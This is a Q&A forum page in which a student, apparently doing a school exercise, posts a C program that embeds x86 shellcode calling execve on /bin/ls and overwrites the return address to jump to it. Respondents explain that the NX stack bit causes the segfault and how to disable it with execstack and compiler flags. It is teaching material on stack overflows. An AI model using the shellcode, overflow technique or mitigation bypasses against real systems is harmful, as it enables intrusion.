4

I'm trying to cause a buffer overflow in the following, very simple, program:

#include <stdio.h>
#include <stdint.h>

void badf(int n, char c, char* buffer)
{

    char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff, 
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c, 
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes

// Overwrite Base Pointer
    //mycode[37] = 0x29;
//mycode[38] = 0xf4;
//mycode[39] = 0xff;
//mycode[40] = 0xbf;

    // Overwrite Instruction Pointer
    // Using debugger, found mycode[] to be loaded in: 0xbffff42d
    mycode[41] = 0x2d;
    mycode[42] = 0xf4;
    mycode[43] = 0xff;
    mycode[44] = 0xbf;

}

void f(int n, char c)
{
    char buffer[37];    
    badf(n,c,buffer);
}

void test()
{
    printf("test");
}

int main()
{
    f(37,0x00);
    return 0;
}

(I've successfully managed to execute test() from the buffer overflow before) Now I'm trying to execute mycode[] by overwriting the instruction pointer with the start of mycode in the stack.

This only half works, the program jumps to the right address, where I can see the correct machine code in the debugger, but then crashes with a segmentation fault, instead of executing the following instructions (see screenshot).

enter image description here

I'm trying to figure out why he crashes before executing the contents of the "injected" code. I'm relatively new to this sort of stuff, I understand segmentation fault means I'm attempting to access memory the OS doesn't want me to?

(PS: 32bit Linux machine, compiling with -fno-stack-protector so I can play with this stuff)

(If any more info is needed I will gladly update the post)

Improve this question
1
  • Did you solve your problem? I have the same issue Commented Mar 14, 2017 at 16:35

2 Answers 2

Reset to default
3

If it's Linux, you can probably make it work by downloading and installing execstack, and follow the instructions here. The segmentation fault is probably a result from your elf binaries by default setting the nx bit, which exectstack selectively undoes. If this doesn't work, you might trigger additional protections, which you may or may not be able to disable.

Improve this answer
Sign up to request clarification or add additional context in comments.

7 Comments

I tried compiling with: "gcc -z execstack -fno-stack-protector -g -static -o bof bof.c" which should do the same no?
@Juicy: this wouldn't work on my distro. Execstack needed to be separately downloaded and installed, and you use it execstack -s <binary name>. You occasionally see the syntax you write suggested, but it doesn't work for me.
It's in the repositories though (for my distro); so simply doing sudo apt-get install execstack should take care of install and configuration.
Thank you! Gave that a try but it's still giving me the seg fault. I believe, as I told dan3, that I've actually done what my lecturer wanted, it's not working on my Debian but hopefully will work on our Uni's Ubuntus.
Well the code that shows up in the debugger at that address is exactly the machine code I tried to inject (system call to execv), so it seems like the right code at the right address
|
3

This sort of exciting trick doesn't work nowadays anymore, sadly. Blame the virus people.

Data segments are marked with the NX (no execute) bit -- which is what triggers the segfault. CPU sees PC in a no-execute region.

Why don't you try overwriting the code of a "real" function pointer (take the address of an existing function) and see what happens (this will possibly fail because self-modifying code is also frowned upon by the compiler / linker / OS, also due to above-mentioned virus people)

Improve this answer

2 Comments

Ok thank you. This is actually for an exercise for school but I'm doing it at home. Do you think I can conclude that I've successfully injected the code and redirected the instruction pointer, but that my modern Debian distro is preventing this for happening?
You can only conclude that you've successfully injected some machine code into a variable, then failed to execute it. Perhaps it would have worked were it not for the NX protections, perhaps not. Update: see suggestion in edited answer

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.